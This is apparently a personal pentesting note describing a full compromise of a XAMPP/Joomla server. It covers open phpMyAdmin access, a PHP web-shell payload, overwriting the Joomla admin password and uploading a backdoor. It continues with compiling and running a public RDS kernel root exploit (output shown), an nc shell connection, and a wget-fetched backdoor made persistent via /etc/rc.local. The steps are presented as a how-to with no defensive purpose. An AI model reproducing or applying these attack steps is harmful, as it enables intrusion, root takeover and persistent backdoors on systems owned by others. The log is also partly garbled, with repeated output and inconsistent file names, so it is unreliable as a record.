KUMEL'S NOTE

Pentesting
Try see of phpmyadmin in XAMPP with address --> http://victim.com/phpmyadmin --> As a default i have in of phpmyadmin main page without confirmation username and a password
In phpmyadmin there are some databases of this system, now i want to create a new database with name victim (create database victim;) and need know where are directory of mysql with Syntax SQL : SELECT @@datadir
Now i know of dir of mysql in : /opt/lampp/var/mysql/ and web is :/opt/lampp/htdocs/
Now trye to create backdoor with syntax sql:
the first step create table with syntax sql :
create table inject(
stack text
) type=myisam;
and than insert value to table inject with syntax:
insert into inject(stack)
values(
‘<pre><body bgcolor=silver><? @system($_REQUEST["v"]); ?></body></pre>’
);
but at this step there is an error syntax, this way can't work and i don't know about the other syntax to create it. cause i'm still learn.
Now i will see joomla's database. There are many tables here, but just see the jos_users table and show all of value there with syntax :
select * from jos_users;
There is an account administrator of joomla with username admin. And now, change the password value and with value of Function MD5.
After that login to Joomla administrator with username admin and password with the value of we have change.
After login download modul upload in joomla at joomla.org install that modul and actived at page joomla.
Now browse to main page joomla, and try to upload file (backdoor)
Ok, upload file success with report :
Done! The file has been saved as: upload/404.php
Now lets access our backdoor at link http://victim/upload/backdoor.php
Find the directory with access permissions rwx-rwx-rwx, and here my victim folder joomla/upload has rwx-rwx-rwx
In my backdoor there is an information : Linux ubuntu-desktop 2.6.32-14-generic and i know thats kernel is vulner.
Now, i'm searching an exploit root to kernel 2.6.32
I try the exploit from exploit-db with number "15285", I think thats code is c so i'm saving with extension .c (15285.c)
Now compile it with command : gcc -w 15285.c -o accessroot
and than upload it to our victim site.
from my backdoor there is a menu network, the function is to actived the port (and i will actived 5678 port.
after the port actived, know from our terminal type : nc 192.168.56.101 5678 #and the result :
/bin/sh: can't access tty; job control turned off
$ ls
404.php
rootaccess
$ ./rootaccess
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc08c8c2c
[+] Resolved default_security_ops to 0xc0773300
[+] Resolved cap_ptrace_traceme to 0xc02f3dc0
[+] Resolved commit_creds to 0xc016dcc0
[+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc08c8c2c
[+] Resolved default_security_ops to 0xc0773300
[+] Resolved cap_ptrace_traceme to 0xc02f3dc0
[+] Resolved commit_creds to 0xc016dcc0
[+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc08c8c2c
[+] Resolved default_security_ops to 0xc0773300
[+] Resolved cap_ptrace_traceme to 0xc02f3dc0
[+] Resolved commit_creds to 0xc016dcc0
[+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
id
uid=0(root) gid=0(root)
whoami
su root
and now upload a backdoor system from backdoor web or type : wget http://link_of_download_backdoor_system. After that create to /etc/rc.local how to exec the backdoor than the backdoor will always run if the system runnning up.